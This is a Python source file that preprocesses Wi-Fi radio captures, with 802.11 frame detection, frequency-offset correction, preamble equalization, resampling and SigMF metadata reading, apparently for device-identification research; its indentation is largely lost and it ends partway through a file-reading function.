from sklearn.preprocessing import normalize
def preprocess_wifi(data_dict, sample_duration, sample_rate, preprocess_type=1, progress=True):
signal_indices = range(len(data_dict['data_file']))
if progress is True:
signal_indices = tqdm(signal_indices)
flag = 0
for i in signal_indices:
signal = data_dict['signal'][i]
orig_sample_rate = data_dict['capture_sample_rate'][i]
start_index = 0
end_index = math.ceil(sample_duration * orig_sample_rate)
if orig_sample_rate == np.int(200e6):
if (preprocess_type == 2) or (preprocess_type == 3):
lowFreq = data_dict['freq_lower_edge'][i]
upFreq = data_dict['freq_upper_edge'][i]
Fc = data_dict['capture_frequency'][i]
signal, flag_i = detect_frame(signal, lowFreq, upFreq, Fc, verbose=False)
flag = flag + flag_i
if preprocess_type == 3:
signal = frac_eq_preamble(signal)
start_index = np.int(start_index)
end_index = np.int(end_index)
if (preprocess_type == 1) or (preprocess_type == 2) or (orig_sample_rate != np.int(200e6)):
signal = signal[start_index:end_index]
with np.errstate(all='raise'):
            try:
                signal = signal / rms(signal)
            except FloatingPointError:
try:
signal += 1.0/np.sqrt(2*signal.size) + 1.0/np.sqrt(2*signal.size)*1j
except FloatingPointError:
signal_size = end_index - start_index
signal = np.ones([signal_size]) * (1.0 + 1.0*1j)/np.sqrt(2*signal_size)
if (preprocess_type == 1) or (orig_sample_rate != np.int(200e6)):
freq_shift = (data_dict['freq_upper_edge'][i] +
data_dict['freq_lower_edge'][i])/2 - data_dict['capture_frequency'][i]
signal = shift_frequency(signal, freq_shift, orig_sample_rate)
signal = resample(signal, orig_sample_rate, sample_rate)
if (preprocess_type == 2):
signal = resample(signal, orig_sample_rate, sample_rate)
data_dict['signal'][i] = signal
data_dict['center_frequency'][i] = (
data_dict['freq_upper_edge'][i] + data_dict['freq_lower_edge'][i])/2.
data_dict['sample_rate'][i] = sample_rate
if (preprocess_type == 2) or (preprocess_type == 3):
print('Successful frame detection on {:.2f}% of signals'.format(
100.0-flag*100.0/len(data_dict['data_file'])))
return data_dict
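# preprocess_type summary (as implemented above, for 200 MS/s captures):
#   1 - shift the labeled band to baseband, RMS-normalize, resample
#   2 - band-limit and frame-detect (detect_frame), RMS-normalize, resample
#   3 - frame-detect, then fractionally spaced LS equalization of the
#       preamble via frac_eq_preamble (320 output samples)
# The FloatingPointError fallbacks substitute a small constant signal when a
# capture is all zeros and normalization would divide by zero.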
def frac_eq_preamble(rx, verbose=False):
Stf_64 = np.sqrt(13/6)*np.array([0, 0, 0, 0, 0, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0,
1+1j, 0, 0, 0, 0, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 0, 0, 0, 0])
stf_64 = ifft(ifftshift(Stf_64))
Ltf = np.array([0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1,
1, 0, 1, -1, -1, 1, 1, -1, 1, -1, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, -1, 1, -1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
ltf = ifft(ifftshift(Ltf))
tx = np.concatenate((stf_64[:-32], stf_64, stf_64, ltf[-32:], ltf, ltf))
L = 160
N = 320
rx = rx.reshape([-1, 1])
R = np.zeros([L, L]) + 0j
p = np.zeros([L, 1]) + 0j
for i in range(N):
j = 10*i
R += rx[j:j+L].dot(rx[j:j+L].conj().T)
p += rx[j:j+L] * tx[i].conj()
c, residuals, rank, sing = np.linalg.lstsq(R, p)
signal_eq = np.zeros([N, 1]) + 0j
for i in range(N):
j = 10*i
signal_eq[i] = rx[j:j+L].T.dot(c.conj())
return signal_eq.flatten()
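# frac_eq_preamble fits a 160-tap equalizer c at the 200 MS/s rate (10 taps
# per 20 MS/s sample) by least squares against the ideal preamble tx:
# accumulate R = sum_i r_i r_i^H and p = sum_i r_i tx[i]*, solve R c = p,
# then emit signal_eq[i] = r_i^T c* for each of the 320 preamble samples.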
def detect_frame(complex_signal, lowFreq, upFreq, Fc, verbose=False):
Fs = 200e6
flag = 0
N = complex_signal.shape[0]
if N % 2 != 0:
complex_signal = complex_signal[:-1]
N -= 1
low_ind = np.int((lowFreq-Fc)*(N/Fs) + N/2)
up_ind = np.int((upFreq-Fc)*(N/Fs) + N/2)
lag = np.int((-Fc + (lowFreq+upFreq)/2)*(N/Fs) + N/2) - np.int(N/2)
X = fftshift(fft(complex_signal))
X[:low_ind] = 0 + 0j
X[up_ind:] = 0 + 0j
X = np.roll(X, -lag)
complex_signal = ifft(ifftshift(X))
    guard_band_upsamp = np.int(2e-6*Fs)
    n_win = 1600 - 160
    lag = 160
search_length_stf_upsamp = min(2*guard_band_upsamp+1, np.int(complex_signal.size))
autocorr_stf_upsamp = np.zeros(search_length_stf_upsamp)
a = np.zeros(search_length_stf_upsamp)+0j
p = np.zeros(search_length_stf_upsamp)
for n in range(search_length_stf_upsamp):
sig1 = complex_signal[n:n+n_win].reshape(1, -1)
sig2 = complex_signal[n+lag:n+n_win+lag].conj().reshape(1, -1)
a[n] = sig1.dot(sig2.T)
p[n] = np.sqrt(np.sum(np.abs(sig1)**2)*np.sum(np.abs(sig2)**2))
autocorr_stf_upsamp = np.abs(a)/p
frame_start_autocorr_upsamp = np.argmax(autocorr_stf_upsamp)
n_short_upsamp = 1600
if frame_start_autocorr_upsamp <= 2*guard_band_upsamp:
if verbose == True:
print('Autocorr prediction = {}'.format(frame_start_autocorr_upsamp))
else:
if verbose == True:
print('Autocorr detection failed\n Prediction = {}'.format(frame_start_autocorr_upsamp))
frame_start_autocorr_upsamp = guard_band_upsamp
flag = 1
return complex_signal[frame_start_autocorr_upsamp:], flag
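# detect_frame: zero the FFT outside [lowFreq, upFreq], roll the occupied
# band to DC, then search a +/- 2 us window for the frame start via the
# normalized lag-160 autocorrelation of the periodic STF (160 samples is one
# short-training period at 200 MS/s); flag = 1 marks a failed detection.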
def offset_compensate_preamble(preamble_in, fs=200e6, verbose=False, option=1):
preamble = preamble_in.copy()
if fs == 200e6:
if preamble.size != 3200:
raise Exception('Size of preamble is {}, but it should be 3200.'.format(preamble.size))
        n_short = 1600
        n_long = 1600
        L = 160
        N = 640
sig3 = preamble[: n_short-L].conj().copy()
sig4 = preamble[L: n_short].copy()
df1 = 1./L * np.angle(sig3.dot(sig4.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df1).flatten()
sig5 = preamble[n_short + 2*L: n_short + 2*L + N].conj().copy()
sig6 = preamble[n_short + N+2*L: n_short + n_long].reshape(1, -1).copy()
df2 = 1./N * np.angle(sig5.dot(sig6.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df2).flatten()
freq_offset = np.array([df1, df2])
elif fs == 20e6:
if preamble.size != 320:
raise Exception('Size of preamble is {}, but it should be 320.'.format(preamble.size))
        n_short = 160
        n_long = 160
        L = 16
        N = 64
sig3 = preamble[np.int(n_short/2):n_short-L].conj().copy()
sig4 = preamble[np.int(n_short/2)+L:n_short].copy()
df1 = 1./L * np.angle(sig3.dot(sig4.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df1).flatten()
sig5 = preamble[n_short+32:n_short+32+N].conj().copy()
sig6 = preamble[n_short+N+32:n_short+n_long].reshape(1, -1).copy()
df2 = 1./N * np.angle(sig5.dot(sig6.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df2).flatten()
freq_offset = np.array([df1, df2])
if option == 1:
return preamble
elif option == 2:
return preamble, freq_offset
else:
raise NotImplementedError
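# offset_compensate_preamble implements the standard two-stage 802.11 CFO
# correction: a coarse estimate df1 from the angle of the lag-L STF
# autocorrelation and a fine estimate df2 from the lag-N repetition of the
# LTF, each removed by multiplying with exp(-1j*n*df). With option=2 the
# per-sample offsets np.array([df1, df2]) (radians/sample) are also returned.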
def get_residuals_preamble(preamble_in, fs, method='subtraction', channel_method='frequency', verbose=False, label=''):
preamble = preamble_in.copy()
preamble_orig = preamble_in.copy()
if fs == 200e6:
if preamble.size != 3200:
raise Exception('Size of preamble is {}, but it should be 3200.'.format(preamble.size))
n_short = 1600
n_long = 1600
L = 160
N = 640
sig3 = preamble[: n_short-L].conj().copy()
sig4 = preamble[L: n_short].copy()
df1 = 1./L * np.angle(sig3.dot(sig4.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df1).flatten()
sig5 = preamble[n_short + 2*L: n_short + 2*L + N].conj().copy()
sig6 = preamble[n_short + N+2*L: n_short + n_long].reshape(1, -1).copy()
df2 = 1./N * np.angle(sig5.dot(sig6.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df2).flatten()
freq_offset = np.array([df1, df2])
cfo_total = np.multiply(np.exp(1j*np.arange(0, preamble.size)*df1).flatten(),
np.exp(1j*np.arange(0, preamble.size)*df2).flatten())
Stf_64 = np.sqrt(13/6)*np.array([0, 0, 0, 0, 0, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0,
1+1j, 0, 0, 0, 0, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 0, 0, 0, 0])
Ltf = np.array([0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1,
1, 0, 1, -1, -1, 1, 1, -1, 1, -1, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, -1, 1, -1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
Ltf1_rx = fftshift(
fft(preamble[n_short+np.int(n_long/5):n_short+np.int(n_long/5 + n_long*2/5)]))
Ltf2_rx = fftshift(fft(preamble[n_short+np.int(n_long/5 + n_long*2/5):n_short+n_long]))
Ltf_mid_rx = fftshift(
fft(preamble[n_short + 2*L - np.int(L/2):n_short + 2*L+N - np.int(L/2)]))
Ltf_avg_rx = (Ltf1_rx + Ltf2_rx)/2
ind_all = np.arange(-32, 32) + (N//2)
H_hat = np.zeros((N)) + 1j*np.zeros((N))
Ltf_interpolated = np.concatenate(
(np.zeros(32*9) + 1j * np.zeros(32*9), Ltf, np.zeros(32*9) + 1j * np.zeros(32*9)))
H_hat[ind_all] = Ltf_avg_rx[ind_all]*Ltf
h_hat = np.roll(ifft(ifftshift(H_hat)), -N//2)
if channel_method == 'time':
ltf_interpolated = ifft(ifftshift(Ltf_interpolated))
ltf_total = np.concatenate(
(ltf_interpolated[-N//2:], ltf_interpolated, ltf_interpolated))
Stf_64_interpolated = np.concatenate(
(np.zeros(32*9) + 1j * np.zeros(32*9), Stf_64, np.zeros(32*9) + 1j * np.zeros(32*9)))
stf_64_interpolated = ifft(ifftshift(Stf_64_interpolated))
stf_total = np.concatenate(
(stf_64_interpolated[-N//2:], stf_64_interpolated, stf_64_interpolated))
preamble_constructed = cfo_total * (np.convolve(np.concatenate((stf_total, ltf_total)), h_hat)[
N//2-1:-N//2])/rms(np.convolve(np.concatenate((stf_total, ltf_total)), h_hat)[N//2-1:-N//2])
elif channel_method == 'frequency':
ltf_interpolated = ifft(ifftshift(H_hat * Ltf_interpolated))
ltf_total = np.concatenate(
(ltf_interpolated[-N//2:], ltf_interpolated, ltf_interpolated))
Stf_64_interpolated = np.concatenate(
(np.zeros(32*9) + 1j * np.zeros(32*9), Stf_64, np.zeros(32*9) + 1j * np.zeros(32*9)))
stf_64_interpolated = ifft(ifftshift(H_hat * Stf_64_interpolated))
stf_total = np.concatenate(
(stf_64_interpolated[-N//2:], stf_64_interpolated, stf_64_interpolated))
preamble_constructed = cfo_total * np.concatenate((stf_total, ltf_total))
if method == 'division':
residuals = preamble_orig/(preamble_constructed+0.001)
elif method == 'subtraction':
residuals = preamble_orig - preamble_constructed
return residuals, preamble_constructed
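# get_residuals_preamble reconstructs an ideal preamble from the estimated
# CFO and LTI channel (time-domain convolution or frequency-domain
# multiplication, per channel_method) and returns the residual
# rx - constructed (or rx / constructed for method='division'), i.e. the
# part of the received preamble the CFO + channel model cannot explain.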
def basic_equalize_preamble(preamble_in, fs, verbose=False, label=''):
preamble = preamble_in.copy()
if fs == 200e6:
if preamble.size != 3200:
raise Exception('Size of preamble is {}, but it should be 3200.'.format(preamble.size))
n_short = 1600
n_long = 1600
L = 160
N = 640
Stf_64 = np.sqrt(13/6)*np.array([0, 0, 0, 0, 0, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0,
1+1j, 0, 0, 0, 0, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 0, 0, 0, 0])
Ltf = np.array([0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1,
1, 0, 1, -1, -1, 1, 1, -1, 1, -1, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, -1, 1, -1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
Ltf1_rx = fftshift(
fft(preamble[n_short+np.int(n_long/5):n_short+np.int(n_long/5 + n_long*2/5)]))
Ltf2_rx = fftshift(fft(preamble[n_short+np.int(n_long/5 + n_long*2/5):n_short+n_long]))
Ltf_mid_rx = fftshift(
fft(preamble[n_short + 2*L - np.int(L/2):n_short + 2*L+N - np.int(L/2)]))
Ltf_avg_rx = (Ltf1_rx + Ltf2_rx)/2
ind_all = np.arange(-32, 32) + (N//2)
H_hat = np.zeros((N)) + 1j*np.zeros((N))
H_hat[ind_all] = Ltf_avg_rx[ind_all]*Ltf
if verbose is True:
freq = np.arange(-32, 32)
H_hat_coarse = H_hat[ind_all]
h_hat_coarse = ifft(ifftshift(H_hat_coarse))
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(freq, np.abs(H_hat_coarse))
plt.grid(True)
plt.title('Magnitude')
plt.xlabel('Frequency bin')
plt.subplot(1, 2, 2)
plt.stem(freq, np.angle(H_hat_coarse))
plt.title('Phase')
plt.xlabel('Frequency bin')
plt.suptitle('Coarse estimation'+label)
plt.grid(True)
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(np.abs(h_hat_coarse))
plt.title('Magnitude')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.subplot(1, 2, 2)
plt.stem(np.angle(h_hat_coarse))
plt.title('Phase')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.suptitle('Coarse estimation'+label)
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.show()
ind_guard = np.concatenate((np.arange(-32, -26), np.arange(27, 32))) + (N//2)
ind_null = np.concatenate(
(np.array([0]), np.arange(-(N//2), -32), np.arange(32, (N//2)))) + (N//2)
ind_pilots = np.array([-21, -7, 7, 21]) + (N//2)
mask_data = np.ones(N)
mask_data_pilots = np.ones(N)
mask_data[list(np.concatenate((ind_guard, ind_null, ind_pilots)))] = 0
mask_data_pilots[list(np.concatenate((ind_guard, ind_null)))] = 0
ind_all_all = np.arange(-(N//2), (N//2)) + N//2
ind_data = ind_all_all[mask_data == 1]
ind_data_pilots = ind_all_all[mask_data_pilots == 1]
Stf_1_eq = fftshift(fft(preamble[n_short-2*N:n_short-N]))
Stf_2_eq = fftshift(fft(preamble[n_short-N:n_short]))
Ltf_1_eq = fftshift(fft(preamble[n_short+n_long-2*N:n_short+n_long-N]))
Ltf_2_eq = fftshift(fft(preamble[n_short+n_long-N:n_short+n_long]))
Stf_1_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
Stf_2_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
Ltf_1_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
Ltf_2_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
Stf_1_eq[ind_guard] = 0
Stf_2_eq[ind_guard] = 0
Ltf_1_eq[ind_guard] = 0
Ltf_2_eq[ind_guard] = 0
Stf_1_eq[ind_null] = 0
Stf_2_eq[ind_null] = 0
Ltf_1_eq[ind_null] = 0
Ltf_2_eq[ind_null] = 0
if verbose is True:
Stf_1_eq_down = Stf_1_eq[ind_all]
Stf_2_eq_down = Stf_2_eq[ind_all]
Ltf_1_eq_down = Ltf_1_eq[ind_all]
Ltf_2_eq_down = Ltf_2_eq[ind_all]
plt.figure(figsize=[13, 4.8])
plt.subplot(1, 3, 1)
plt.scatter(Stf_1_eq_down.real, Stf_1_eq_down.imag)
plt.title('Equalized STF - 1')
plt.subplot(1, 3, 2)
plt.scatter(Stf_2_eq_down.real, Stf_2_eq_down.imag)
plt.title('Equalized STF - 2')
plt.subplot(1, 3, 3)
plt.scatter(Stf_64.real, Stf_64.imag)
plt.title('Actual STF')
plt.suptitle('Signal constellations')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[13, 4.8])
plt.subplot(1, 3, 1)
plt.scatter(Ltf_1_eq_down.real, Ltf_1_eq_down.imag)
plt.title('Equalized LTF - 1')
plt.subplot(1, 3, 2)
plt.scatter(Ltf_2_eq_down.real, Ltf_2_eq_down.imag)
plt.title('Equalized LTF - 2')
plt.subplot(1, 3, 3)
plt.scatter(Ltf.real, Ltf.imag)
plt.title('Actual LTF')
plt.suptitle('Signal constellations')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.show()
stf_1_eq = ifft(ifftshift(Stf_1_eq))
stf_2_eq = ifft(ifftshift(Stf_2_eq))
ltf_1_eq = ifft(ifftshift(Ltf_1_eq))
ltf_2_eq = ifft(ifftshift(Ltf_2_eq))
preamble_eq = np.concatenate(
(stf_1_eq[-(N//4):], stf_1_eq, stf_2_eq[-(N//4):], stf_2_eq, ltf_1_eq[-(N//2):], ltf_1_eq, ltf_2_eq))
elif fs == 20e6:
if preamble.size != 320:
raise Exception('Size of preamble is {}, but it should be 320.'.format(preamble.size))
n_short = 160
n_long = 160
Stf_64 = np.sqrt(13/6)*np.array([0, 0, 0, 0, 0, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0,
1+1j, 0, 0, 0, 0, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 0, 0, 0, 0])
Ltf = np.array([0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1,
1, 0, 1, -1, -1, 1, 1, -1, 1, -1, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, -1, 1, -1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
L = 16
N = 64
Ltf1_rx = fftshift(
fft(preamble[n_short+np.int(n_long/5):n_short+np.int(n_long/5 + n_long*2/5)]))
Ltf2_rx = fftshift(fft(preamble[n_short+np.int(n_long/5 + n_long*2/5):n_short+n_long]))
Ltf_mid_rx = fftshift(
fft(preamble[n_short + 2*L - np.int(L/2):n_short + 2*L+N - np.int(L/2)]))
Ltf_avg_rx = (Ltf1_rx + Ltf2_rx)/2
AA = np.zeros((N, N)) + 0j
for m in range(N):
for n in range(L+1):
AA[m, n] = Ltf[m] * np.exp(-1j*2*np.pi*m*n/N)
A = AA[:, :L+1] * np.exp(1j*np.pi*np.arange(L+1)).reshape(1, -1)
ind_all = np.arange(-32, 32) + 32
ind_guard = np.concatenate((np.arange(-32, -26), np.arange(27, 32))) + 32
ind_null = np.array([0]) + 32
mask_data_pilots = np.ones(64)
mask_data_pilots[list(np.concatenate((ind_guard, ind_null)))] = 0
ind_data_pilots = ind_all[mask_data_pilots == 1]
h_hat_small, residuals, rank, singular_values = np.linalg.lstsq(
A[ind_data_pilots, :], Ltf_mid_rx[ind_data_pilots], rcond=None)
h_hat = np.zeros(N)+0j
h_hat[:L+1] = h_hat_small
H_hat = fftshift(fft(h_hat))
H_hat = Ltf_avg_rx*Ltf
if verbose is True:
freq = np.arange(-32, 32)
H_hat_coarse = Ltf_mid_rx*Ltf
h_hat_coarse = ifft(ifftshift(H_hat_coarse))
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(freq, np.abs(H_hat_coarse))
plt.grid(True)
plt.title('Magnitude')
plt.xlabel('Frequency bin')
plt.subplot(1, 2, 2)
plt.stem(freq, np.angle(H_hat_coarse))
plt.title('Phase')
plt.xlabel('Frequency bin')
plt.suptitle('Coarse estimation')
plt.grid(True)
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(np.abs(h_hat_coarse))
plt.title('Magnitude')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.subplot(1, 2, 2)
plt.stem(np.angle(h_hat_coarse))
plt.title('Phase')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.suptitle('Coarse estimation')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(freq, np.abs(H_hat))
plt.grid(True)
plt.title('Magnitude')
plt.xlabel('Frequency bin')
plt.subplot(1, 2, 2)
plt.stem(freq, np.angle(H_hat))
plt.title('Phase')
plt.xlabel('Frequency bin')
plt.suptitle('Frequency domain least squares estimation')
plt.grid(True)
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.9])
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(np.abs(h_hat))
plt.title('Magnitude')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.subplot(1, 2, 2)
plt.stem(np.angle(h_hat))
plt.title('Phase')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.suptitle('Frequency domain least squares estimation')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.9])
ind_all = np.arange(-32, 32) + 32
ind_guard = np.concatenate((np.arange(-32, -26), np.arange(27, 32))) + 32
ind_null = np.array([0]) + 32
ind_pilots = np.array([-21, -7, 7, 21]) + 32
mask_data = np.ones(64)
mask_data_pilots = np.ones(64)
mask_data[list(np.concatenate((ind_guard, ind_null, ind_pilots)))] = 0
mask_data_pilots[list(np.concatenate((ind_guard, ind_null)))] = 0
ind_data = ind_all[mask_data == 1]
ind_data_pilots = ind_all[mask_data_pilots == 1]
Stf_1_eq = fftshift(fft(preamble[n_short-2*N:n_short-N]))
Stf_2_eq = fftshift(fft(preamble[n_short-N:n_short]))
Ltf_1_eq = fftshift(fft(preamble[n_short+n_long-2*N:n_short+n_long-N]))
Ltf_2_eq = fftshift(fft(preamble[n_short+n_long-N:n_short+n_long]))
Stf_1_eq[ind_data_pilots] /= H_hat[ind_data_pilots]
Stf_2_eq[ind_data_pilots] /= H_hat[ind_data_pilots]
Ltf_1_eq[ind_data_pilots] /= H_hat[ind_data_pilots]
Ltf_2_eq[ind_data_pilots] /= H_hat[ind_data_pilots]
Stf_1_eq[ind_guard] = 0
Stf_2_eq[ind_guard] = 0
Ltf_1_eq[ind_guard] = 0
Ltf_2_eq[ind_guard] = 0
Stf_1_eq[ind_null] = 0
Stf_2_eq[ind_null] = 0
Ltf_1_eq[ind_null] = 0
Ltf_2_eq[ind_null] = 0
if verbose is True:
plt.figure(figsize=[13, 4.8])
plt.subplot(1, 3, 1)
plt.scatter(Stf_1_eq.real, Stf_1_eq.imag)
plt.title('Equalized STF - 1')
plt.subplot(1, 3, 2)
plt.scatter(Stf_2_eq.real, Stf_2_eq.imag)
plt.title('Equalized STF - 2')
plt.subplot(1, 3, 3)
plt.scatter(Stf_64.real, Stf_64.imag)
plt.title('Actual STF')
plt.suptitle('Signal constellations')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[13, 4.8])
plt.subplot(1, 3, 1)
plt.scatter(Ltf_1_eq.real, Ltf_1_eq.imag)
plt.title('Equalized LTF - 1')
plt.subplot(1, 3, 2)
plt.scatter(Ltf_2_eq.real, Ltf_2_eq.imag)
plt.title('Equalized LTF - 2')
plt.subplot(1, 3, 3)
plt.scatter(Ltf.real, Ltf.imag)
plt.title('Actual LTF')
plt.suptitle('Signal constellations')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.show()
stf_1_eq = ifft(ifftshift(Stf_1_eq))
stf_2_eq = ifft(ifftshift(Stf_2_eq))
ltf_1_eq = ifft(ifftshift(Ltf_1_eq))
ltf_2_eq = ifft(ifftshift(Ltf_2_eq))
preamble_eq = np.concatenate(
(stf_1_eq[-32:], stf_1_eq, stf_2_eq, ltf_1_eq[-32:], ltf_1_eq, ltf_2_eq))
return preamble_eq
def rms(x):
return np.sqrt(np.mean(x * np.conjugate(x)))
def shift_frequency(vector, freq_shift, fs):
t = np.arange(0, np.size(vector)) / fs
modulation = np.exp(-1j * 2 * np.pi * freq_shift * t) / np.sqrt(2)
return vector * modulation
def resample(vector, fs, dfs):
    fs = int(round(fs))
    dfs = int(round(dfs))
cfs = lcm(fs, dfs)
if cfs > fs:
vector = resampy.resample(vector, fs, cfs, filter='kaiser_best')
return resampy.resample(vector, cfs, dfs, filter='kaiser_best')
def lcm(a, b):
    return a * b // math.gcd(a, b) if a and b else 0
def get_sliding_window(x, window_size=10, stride=1, fs=200e6, fs_natural=20e6):
shape_ = x.shape
window_size_samples = np.int(window_size * (fs/fs_natural))
stride_samples = np.int(stride * (fs/fs_natural))
for i in tqdm(np.arange(0, shape_[1] - window_size_samples + stride_samples, stride_samples)):
if i == 0:
y = x[:, i:i + window_size_samples, :].copy()
else:
y = np.concatenate((y, x[:, i:i + window_size_samples, :]), axis=0)
return y
def read_wifi(files, base_data_directory, device_map, progress=True):
csv = files['csv_objects'].items()
if progress is True:
csv = tqdm(csv)
data_dict = dict(signal={}, device_key={}, sample_rate={}, capture_sample_rate={}, capture_frequency={}, capture_hw={},
center_frequency={}, freq_lower_edge={}, freq_upper_edge={},
reference_number={}, data_file={}, sample_start={}, sample_count={},
device_type={}, device_id={}, device_manufacturer={}
)
signal_index = 0
for file, signal_list in csv:
while file[0] == '/' or file[0] == '\\':
file = file[1:]
data_file = os.path.join(base_data_directory, file)
metadata_file = data_file.replace('sigmf-data', 'sigmf-meta')
all_signals = json.load(open(metadata_file))
capture = dict(capture_sample_rate=all_signals['global']['core:sample_rate'],
sample_rate=all_signals['global']['core:sample_rate'],
capture_hw=all_signals['global']['core:hw'],
capture_frequency=all_signals['capture'][0]['core:frequency'],
data_file=data_file)
for signal_name in signal_list:
for key, value in capture.items():
data_dict[key][signal_index] = value
capture_properties = all_signals['capture']
signal_properties = get_json_signal(
all_signals['annotations'], capture_properties[0], signal_name, type='wifi')
for key, value in signal_properties.items():
data_dict[key][signal_index] = value
device_id = signal_properties['device_id']
data_dict['device_key'][signal_index] = device_map[device_id]
filename = data_dict['data_file'][signal_index]
start_sample = data_dict['sample_start'][signal_index]
sample_count = data_dict['sample_count'][signal_index]
data, buffer_start, buffer_end = read_sample(
filename, start_sample, sample_count, desired_buffer=0)
data_dict['signal'][signal_index] = data
data_dict['center_frequency'][signal_index] = data_dict['capture_frequency'][signal_index]
signal_index = signal_index + 1
return data_dict
def parse_input_files(input_csv, devices_csv):
    device_list = []
    device_map = {}
    csv_objects = {}
with open(devices_csv) as devices_csv_file:
devices_reader = csv.reader(devices_csv_file, delimiter=',')
for device in devices_reader:
device_list.append(device[0])
for i, device in enumerate(device_list):
device_map[device] = i
with open(input_csv) as input_csv_file:
input_reader = csv.reader(input_csv_file, delimiter=',')
for row in input_reader:
csv_objects[row[0]] = row[1:]
return {'device_list': device_list,
'device_map': device_map,
'csv_objects': csv_objects}
def get_json_signal(json_annotations, capture, signal_id, type=None):
for signal in json_annotations:
if signal != {} and signal['capture_details:signal_reference_number'] == signal_id:
if 'rfml:label' in signal:
signal_label = signal['rfml:label']
if type is None:
type = signal_label[0]
else:
            signal_label = (None, None, None)
if type is None:
type = "unknown"
if type == "wifi":
return {'freq_lower_edge': signal['core:freq_lower_edge'],
'freq_upper_edge': signal['core:freq_upper_edge'],
'sample_start': signal['core:sample_start'],
'sample_count': signal['core:sample_count'],
'device_type': signal_label[0],
'device_manufacturer': signal_label[1],
'device_id': signal_label[2]}
elif type == "ADS-B":
        return {'snr': signal['capture_details:SNRdB'],
'reference_number': signal['capture_details:signal_reference_number'],
'freq_lower_edge': capture['core:freq_lower_edge'],
'freq_upper_edge': capture['core:freq_upper_edge'],
'sample_start': signal['core:sample_start'],
'sample_count': signal['core:sample_count'],
'device_type': signal_label[0],
'device_id': signal_label[1]}
else:
print('Unknown signal type', type)
return None
return None
def read_sample(filename, start_sample, sample_count, desired_buffer):
buffer_start = min(desired_buffer, start_sample)
buffer_end = desired_buffer
sample_count += (buffer_start + buffer_end)
with open(filename, "rb") as f:
f.seek((start_sample - buffer_start) * 4)
raw = np.fromfile(f, dtype='int16', count=2*sample_count)
samples_read = int(raw.size / 2)
buffer_end -= (sample_count - samples_read)
